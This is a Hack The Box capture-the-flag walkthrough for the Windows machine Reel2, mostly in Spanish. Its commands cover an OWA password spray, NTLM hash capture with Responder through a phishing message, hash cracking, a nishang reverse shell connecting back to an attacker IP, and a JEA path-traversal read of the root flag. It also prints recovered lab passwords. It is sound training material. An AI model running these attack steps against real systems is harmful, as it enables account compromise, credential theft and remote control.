Reel2

Reel2


HTB Windows

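# Initial recon: three nmap passes plus a reachability check.
# NOTE: the original gave the first two scans the same -oA basename (reel2),
# so the second run overwrote the first's .nmap/.gnmap/.xml files; each scan
# now writes to its own basename.
# Aggressive full-port scan running the "vuln" NSE category. --min-rate=10000
# is noisy and can drop results on a flaky VPN link; --script-timeout caps
# each NSE script at 15 s so one hanging script does not stall the scan.
nmap -A -p- -oA reel2-vuln 10.10.10.210 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Default scripts + version detection + OS fingerprint over all TCP ports.
nmap -sC -sV -O -p- -oA reel2 10.10.10.210

# UDP sweep. All 65535 UDP ports is very slow (ICMP unreachable replies are
# rate-limited); run --top-ports 100 first and fall back to -p- only if needed.
nmap -sU -O -p- -oA reel2-udp 10.10.10.210

# Single ICMP echo: confirms the host answers (a TTL near 128 usually means Windows).
ping -c 1 10.10.10.210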


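# Quick full-TCP port discovery, a resolvable hostname, then a SYN scan whose
# grepable output feeds extractPorts.
# -T5 is the most aggressive timing template and can miss ports on a lossy
# VPN; -n skips DNS and --open reports only open ports.
nmap -p- --open -T5 -v -n 10.10.10.210

# Map the box to reel2.htb. Only append when the entry is not already there,
# so re-running the writeup does not stack duplicate lines in /etc/hosts
# (the original appended unconditionally).
grep -qE '^[[:space:]]*10\.10\.10\.210[[:space:]]+reel2\.htb([[:space:]]|$)' /etc/hosts \
  || printf '%s\n' "10.10.10.210 reel2.htb" | sudo tee -a /etc/hosts

# SYN scan of every port, no host-discovery probe (-Pn), grepable output to allPorts.
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.210 -oG allPorts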


# extractPorts is a custom helper, not a standard tool: it pulls the open
# ports out of the grepable allPorts file so they can be passed to the
# targeted scan below. Define it (or substitute grep/cut) before relying on it.
extractPorts allPorts


# Default scripts + version detection against only the ports found open.
# 5985 is WinRM, 80/443/8080 are web services; the 6xxx range is presumably
# the Exchange/RPC endpoints that the later /owa discovery confirms.
nmap -sCV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6019,6116,8080 10.10.10.210 -oN targeted


# bc here is presumably an alias for bat/batcat (syntax-highlighted pager),
# not the calculator: render the nmap output with ruby highlighting.
bc targeted -l rb


# Fingerprint the web application on 8080 (framework, server headers, cookies).
whatweb http://10.10.10.210:8080


# Enumerate well-known web paths on the three HTTP(S) ports; results to webScan.
nmap --script http-enum -p80,443,8080 10.10.10.210 -oN webScan


Nos dirigimos a http://10.10.10.210:8080


Rellenamos el formulario de registro con la información adecuada.


Vamos a seguir al usuario Sven


Al hacer clic en Sven podemos seguirlo desde su página.

Después nos dirigimos a la página de mensajes.


Queremos obtener la lista completa de usuarios registrados para construir un diccionario de nombres de usuario.

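# Scrape every displayed name from the (empty) search results into `users`,
# one "First Last" per line, for username generation.
# NOTE: the original second sed was `sed 's<\/span//'`: `<` became the
# delimiter and the command has no terminator, so sed aborts with
# "unterminated `s' command" and `users` ends up empty. Fixed below, with /g
# so every occurrence is stripped. The awk field positions (4 and 6 when the
# row is split on '>') assume the markup of the user_follow_box_a rows seen on
# the page — re-check them if the output looks wrong.
curl -s -X GET 'http://10.10.10.210:8080/search?q=' \
  | grep "user_follow_box_a" \
  | awk -F '>' '{print $4 " " $6}' \
  | sed -e 's/<br @//g' -e 's/<\/span//g' > users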


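# Turn the "First Last" names into usernames using the f.last convention
# (e.g. s.svensson) for the spray below.
# The original ran spindrift twice with the identical --format, once with >
# and once with >>, which only duplicated every line; generate once and
# de-duplicate. If a second naming scheme was intended, add another
# --format run in front of sort -u.
python /opt/SprayingToolkit/spindrift.py users --format "{f}.{last}" \
  | sort -u > users_dictionary.txt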


# Brute-force IIS-specific paths on the HTTPS site. -t 200 threads is
# aggressive over a VPN (expect timeouts/false negatives); hiding 403 along
# with 404 can also drop directories that exist but forbid listing, so it is
# worth a second pass showing 403s.
wfuzz -c --hc=404,403 -t 200 -w /usr/share/SecLists/Discovery/Web-Content/IIS.fuzz.txt https://10.10.10.210/FUZZ


Nos dirigimos a https://10.10.10.210/owa


# Password-spray a single password across every generated username against
# OWA. One password per round keeps each account far below typical lockout
# thresholds; do not loop several passwords without checking the domain
# lockout policy first, or you will lock out the accounts you are after.
python /opt/SprayingToolkit/atomizer.py owa 10.10.10.210 'Summer2020' users_dictionary.txt

Las credenciales válidas serían HTB\s.svensson:Summer2020


La interfaz de OWA está en sueco.


Hacemos clic en este botón.


Ponemos el siguiente mensaje


Debes poner tu IP (la de tun0, donde escuchará Responder) en el mensaje y hacer clic en «Skicka» (enviar).

# Listen on the VPN interface. When the recipient follows the link to our IP
# from the message, the resulting NTLM authentication is expected to land
# here as a Net-NTLMv2 challenge/response that we can crack offline.
responder -I tun0


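# Crack the captured challenge/response with rockyou. Pin the hash format:
# Responder's capture here is expected to be Net-NTLMv2, and john's
# autodetection can pick a neighbouring format (or warn about several
# candidates) for that output, after which a wrong pick silently finds
# nothing. Adjust --format if `hash` turns out to be a different type.
# --show prints the cracked plaintext afterwards.
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash
john --show --format=netntlmv2 hash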


# WinRM (5985) shell as k.svensson with the cracked password.
evil-winrm -i 10.10.10.210 -u k.svensson -p kittycat1


# Start PowerShell (Core) locally; the next commands run inside it.
pwsh

# Build a credential object for k.svensson and open a remote PowerShell
# session over WinRM. Negotiate lets NTLM be used since this client is not
# domain-joined.
$plain = 'kittycat1'
$secure = ConvertTo-SecureString -String $plain -AsPlainText -Force
$cred = [System.Management.Automation.PSCredential]::new('htb\k.svensson', $secure)
Enter-PSSession -ComputerName 10.10.10.210 -Credential $cred -Authentication Negotiate


# Read the user flag (cat is an alias of Get-Content). The command is wrapped
# in a script block; this session presumably rejects bare commands
# (restricted endpoint) — TODO confirm, e.g. via $ExecutionContext.SessionState.LanguageMode.
&{cat ../Desktop/user.txt}


# List the user's Documents folder (ls is an alias of Get-ChildItem), again
# wrapped in a script block for this session.
&{ls ../Documents/}


# Serve the current directory over HTTP so the target can fetch the payload.
# This binds every interface; add `--bind <tun0 IP>` so the share is not
# exposed beyond the VPN, and serve from a directory that holds only the payload.
python3 -m http.server 80


# Take a copy of nishang's one-line TCP reverse shell and edit it in place.
cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 .

vim Invoke-PowerShellTcpOneLine.ps1

Cambiar la IP (y el puerto, si hace falta) en `System.Net.Sockets.TCPClient("10.10.14.9",443)` dentro de este archivo por la de tu interfaz tun0; debe coincidir con el listener de nc más abajo.


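# Encode a PowerShell script as the UTF-16LE base64 that `powershell -e`
# expects. The original piped through `tconv`, a typo for iconv, which fails
# with "command not found" and leaves an empty payload.
# $1 - path to the .ps1 file. Prints the base64 string followed by a newline.
# Newlines are stripped to produce a single line; that is only safe when the
# script is already a one-liner (the nishang one is) — a multi-line script
# would need ';' separators instead.
ps_b64() {
  tr -d '\n' < "$1" | iconv -f utf-8 -t utf-16le | base64 -w 0
  echo
}
ps_b64 Invoke-PowerShellTcpOneLine.ps1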


# Launch the reverse shell: replace ... with the base64 string produced by the
# encoder (PowerShell decodes -e as UTF-16LE). Start the nc listener first.
&{Powershell -e ...}

# Catch the reverse shell on 443 (must match the port in the .ps1);
# rlwrap adds line editing and history to the raw nc session.
rlwrap nc -nlvp 443


# Situational awareness in the new shell: token privileges and OS bitness.
whoami /priv

[Environment]::Is64BitOperatingSystem


# Inspect the JEA role-capability file, dropping the comment lines so only
# the active settings (visible cmdlets/functions) remain.
Set-Location Documents

Get-Content jea_test_account.psrc | Select-String -Pattern '^#' -NotMatch


# Hex-dump the log file; the jea_test_account password used below is
# recovered from its contents.
Get-Content 000003.log | Format-Hex


# Connect to the JEA endpoint as jea_test_account. -ConfigurationName selects
# the restricted session configuration, so only the commands exposed by the
# role capability file are available.
$plain = 'Ab!Q@vcg^%@#1'
$secure = ConvertTo-SecureString -String $plain -AsPlainText -Force
$jeaCred = [System.Management.Automation.PSCredential]::new('htb\jea_test_account', $secure)
Enter-PSSession -ComputerName 10.10.10.210 -Credential $jeaCred -Authentication Negotiate -ConfigurationName jea_test_account


# Check-File is a function exposed by the JEA role (see the .psrc above).
# It presumably only permits paths under C:\ProgramData and validates the
# prefix as a string rather than resolving the path first, so the ..\
# segment walks out of the allowed tree and reads the root flag — a classic
# JEA path-validation mistake; normalise with Resolve-Path before checking.
Check-File C:\ProgramData\..\Users\Administrator\Desktop\root.txt

